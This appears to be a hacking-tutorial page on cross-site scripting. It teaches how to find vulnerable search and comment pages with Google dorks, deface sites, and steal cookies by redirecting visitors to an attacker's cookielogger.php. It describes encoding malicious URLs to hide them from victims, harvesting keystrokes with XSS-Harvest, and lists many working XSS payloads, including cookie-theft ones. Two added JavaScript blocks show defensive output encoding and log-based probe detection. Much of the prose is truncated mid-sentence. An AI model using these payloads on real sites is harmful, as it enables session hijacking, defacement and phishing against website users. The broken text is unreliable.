Cross Site Scripting (XSS)
'XSS' is also known as 'CSS' (Cross Site Scripting). It is a very common vulnerability found in web applications: XSS allows the attacker to INSERT malicious code. There are many types of XSS attacks; I will mention the 3 most used. This kind of vulnerability allows an "attacker" to inject code into the affected application in order to bypass access to the website or to run "phishing" attacks on its users. This technique is also used for website hacking.
Types of XSS:
DOM-Based: DOM-based cross-site scripting allows an attacker to work not on a victim website but on the victim's local machine. Operating systems usually ship "from birth" with some HTML pages created for different purposes, and since humans make mistakes, these HTML pages can often be exploited due to code vulnerabilities. DOM-based XSS exploits these problems on users' local machines in this way:
Non-Persistent: Non-persistent XSS is actually the most common vulnerability found on the Net. It is called "non-persistent" because it works on an immediate HTTP response from the victim website: it shows up when the web page takes the data provided by the attacker's client and automatically generates a result page for the attacker himself. Building on this, the attacker can provide some malicious code and try to make the server execute it in order to obtain some result. The most common application of this kind of vulnerability is in website search engines: the attacker writes some arbitrary HTML code in the search textbox and, if the website
Persistent: Persistent XSS vulnerabilities are similar to the second type (non-persistent XSS), because both work on a victim site and try to steal users' information. The difference is that in websites vulnerable to persistent XSS the attacker doesn't need to
This works when the tool provided (the guestbook in the example) doesn't do any
To start finding these vulnerabilities you can check Blogs, Forums, Shoutboxes, Comment Boxes and Search Boxes; there are too many to mention. Use 'Google Dorks' to make the finding easier. OK, if you want to get cracking, go to google.com and type inurl:"search.php?q=" now that is a common page and has a lot
Basics of XSS:
<script>alert("Priyanshu")</script>
This will show an alert popup saying Priyanshu (without quotes). So, use "search.php?q=" and you can simply try the following on a website that has it:
http://website.com/search.php?q=<script>alert("Priyanshu")</script>
There is a good chance of it working, but don't be worried if it doesn't; just try different sites. You can insert HTML, not just JavaScript:
http://website.com/search.php?q=<br><br><b><u>Priyanshu</u></b>
If you see the bold text on the page and the new lines, then you know it is vulnerable.
Example: How to Deface a Website using XSS?
<html><body><IMG SRC="http://website.com/yourDefaceIMAGE.png"></body></html>
OK, now if you change the link to a valid picture link, save it and run it, you will see what I mean. Right now, say you have found a Shoutbox, Comment box, or anything:
<IMG SRC="http://site.com/yourDefaceIMAGE.png">
The other tags are not needed, as the page will already have them. OK, it helps to http://site.com/xss.swf
window.open( "http://www.hackersonlineclub.tk/" )</script>
There are many other ways that you can find using Google or other websites.
How to Cookie Stealing using XSS?
How To Make A Cookie Stealer PHP script?
OK, now you have it, save it as a .php file and upload it to your server, remember to
window.location = "http://yourServer.com/cookielogger.php?c="+document.cookie
Now when a user visits the page that got injected, they will be sent to the site and the cookie will be stolen. But now you ask: what if my site has not got this kind of attack, it only shows data once and doesn't store it?
Well, let's say we had a page search.php?q=. We can use the following code to make a malicious URL from it, and maybe hex or base64 encode it so people can't see the code:
http://site.com/search.php?q=document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie
')alert('xss'); that will do the same thing as <script>alert("XSS")</script> on a vulnerable server.
Some other ways to bypass filtration
Advanced XSS: a way to bypass magic quotes filtration: http://www.asciitable.com/ This will help you write what you want. In my examples I'll be writing "HOC", which is the following code: 72 79 67. OK, now we have the decimal value of our string, we need to know what function in JavaScript converts this. String.fromCharCode() is suitable for this kind of thing; it's easy to set up, and I'm going to give it my args below:
String.fromCharCode(72, 79, 67)
OK, now "String.fromCharCode(72, 79, 67)" is the JavaScript (ASCII code) way of saying "HOC".
<script>alert(String.fromCharCode(72, 79, 67))</script>
For more XSS script coding visit Source: http://ha.ckers.org
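From the defender's side, the reason the fromCharCode trick defeats magic-quotes style filtering is that the filter looks for specific characters; contextual output encoding of the reflected search term does not filter anything and so neutralises the plain <script> probe and the fromCharCode variant alike. The following is an added example written for this page, not code from the original post; it runs under Node.js and the function names are my own.

```javascript
// Added example, not code from the original post: contextual HTML escaping of
// a reflected "q" parameter (as in search.php?q=) neutralises both the plain
// <script> payload and the String.fromCharCode bypass, because no filter is
// consulted at all: every '<', '>', '"', "'" and '&' is encoded. Runs under Node.

// Escape the five characters that matter in an HTML text or attribute context.
function escapeHtml(str) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(str).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable pattern: the search term is echoed straight into the page.
function renderVulnerable(q) {
  return `<p>Results for: ${q}</p>`;
}

// Hardened pattern: same template, q encoded for its HTML context.
function renderSafe(q) {
  return `<p>Results for: ${escapeHtml(q)}</p>`;
}

// Reviewer check: does the rendered page still contain a script tag or an
// inline event handler (onerror=, onload=, ...) in a live HTML position?
function containsActiveContent(html) {
  return /<\s*script\b|<\w+[^>]*\son\w+\s*=/i.test(html);
}

// Probe strings quoted on the page.
const PAYLOADS = [
  '<script>alert("Priyanshu")</script>',
  '<script>alert(String.fromCharCode(72, 79, 67))</script>',
  '<img src=x onerror=alert(document.domain)>',
];

// Summarise which rendering leaves each payload live; every entry of the
// safeIsLive column should be false.
function compare(payloads = PAYLOADS) {
  return payloads.map((p) => ({
    payload: p,
    vulnerableIsLive: containsActiveContent(renderVulnerable(p)),
    safeIsLive: containsActiveContent(renderSafe(p)),
  }));
}

console.table(compare());
```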
XSS-Harvest: Harvesting Cross Site Scripting, Clicks, Keystrokes and Cookies
Even today many of us still do not understand the impact of an exploited XSS vulnerability, and I include the security community in this statement. To summarise, a successfully exploited XSS vulnerability will allow the interception of ALL keystrokes, ALL mouse actions and ALL cookies (unless protected by scope) on ALL pages of the affected domain, regardless of whether the vulnerability is "reflected" or "persistent".
XSS-Harvest is a multi-threaded pre-forking web server written in Perl, and requires no dependencies other than a couple of common Perl modules; you do not need a web server or database to use this tool.
* The infection script adds the relevant event listeners (keystrokes, onload() and mouse clicks) to the vulnerable page and sets up communication with the XSS-Harvest server.
How to Exploit XSS with XSS-Harvest?
Understand the markup of the page. You should be looking to insert syntactically correct <script></script> tags into the source of the vulnerable page. Most attackers will insert something like '<script>alert(1)</script>' at this stage to ensure the page is actually vulnerable.
Start the XSS-Harvest server as root if you wish to bind to a TCP port < 1024 (the default port is 80), or as a limited user on a port > 1024 using the -p option. To start the server you must instruct it to listen with the -l option.
Insert the following 'injection string' into the vulnerable page:
This will return the client-side JavaScript to the victim, indicated by the 'i' in the URL.
./xss-harvest.pl -l -r http://vulnerablepage.local/login.html
Basic dependencies:
New: Advanced Scripts To Find XSS Vulnerabilities In Websites.
Just copy any script and try...
To Redirect exploit code:
';redirecturl='javascript:alert("XSS")
Now for XSS
Example: www.xyz.com?q="XSS Script"
<body onload=alert(1)>
"><%2Fstyle<%2Fscript><script>confirm("XSS By Priyanshu")<%2Fscript>
<body onload=document.getElementById("xsrf").submit()>
<a href="data:text/html;based64_,<svg/onload=\u0061l&101%72t(1)>">X</a
<a href="data:text/html;based64_,<svg/onload=\u0061l&101%72t(document.cookie)>">X</a
<img src=x onerror=alert(document.domain)>
x"></script><img src=x onerror=alert(1)>
q=" onclick="alert(/XSS/) ">http://a
<img src=x onerror=prompt(1);> by
"> "><img src=x onerror=prompt(0)>.txt.jpg
"><img src=x onerror=alert(document.cookie)>
"><img src=x onerror=prompt(1);>
"><script>alert('XSS')</script>
id=abc"><Script>alert(/xss/)</SCRIPT>
"><img src=" " onMouseover=prompt(/xss/);>
Default.aspx/" onmouseout="confirm(1)'x="
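The strings above are exactly what shows up in a web server's access log when a search page is being probed, and the light obfuscation they use (percent-encoding, numeric entities, \u escapes) is easy to undo before matching. The following detector is an added example written for this page, not code from the original post; it runs under Node.js, the log lines are constructed, and the function names are my own.

```javascript
// Added example, not code from the original post: flag requests carrying
// probe strings like those listed above in web-server access logs, so a
// defender sees reflected-XSS testing against search.php-style pages.
// Log lines below are constructed for this example; function names are mine.

// Undo the light obfuscation seen in the payloads above: percent-encoding
// (%2F, %22), numeric HTML entities (&#101;) and \uXXXX escapes.
function normalise(query) {
  let s = query.replace(/\+/g, ' ');
  try { s = decodeURIComponent(s); } catch (e) { /* malformed %; keep raw */ }
  s = s.replace(/&#x([0-9a-f]+);?/gi, (_, h) => String.fromCharCode(parseInt(h, 16)));
  s = s.replace(/&#(\d+);?/g, (_, d) => String.fromCharCode(Number(d)));
  s = s.replace(/\\u([0-9a-f]{4})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)));
  return s;
}

// Probe families present in the list above: script tags, inline event
// handlers, javascript:/data: URLs, the fromCharCode trick, cookie/location access.
const PROBE_PATTERNS = [
  /<\s*script\b/i,
  /<\w+[^>]*\son\w+\s*=/i,
  /javascript\s*:/i,
  /data\s*:\s*text\/html/i,
  /string\.fromcharcode/i,
  /document\.(cookie|location)/i,
];

// Pull the request target out of a Common Log Format line.
function requestPath(line) {
  const m = line.match(/"(?:GET|POST)\s+(\S+)/);
  return m ? m[1] : '';
}

// A line is a probe if its decoded query string matches any pattern.
function isXssProbe(line) {
  const path = requestPath(line);
  const qs = path.includes('?') ? path.slice(path.indexOf('?') + 1) : '';
  return PROBE_PATTERNS.some((re) => re.test(normalise(qs)));
}

const flaggedLines = (lines) => lines.filter(isXssProbe);

// Constructed sample: two probes against search.php, two benign requests.
const SAMPLE_LOG = [
  '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /search.php?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 512',
  '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /search.php?q=%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt(1)%3E HTTP/1.1" 200 512',
  '198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /search.php?q=pentest+report HTTP/1.1" 200 1024',
  '198.51.100.7 - - [10/Oct/2023:13:56:09 +0000] "GET /index.html HTTP/1.1" 200 2048',
];
```

Run it over real logs with `flaggedLines(lines)`; a hit is a reason to check whether the echoed parameter is output-encoded, not proof of compromise.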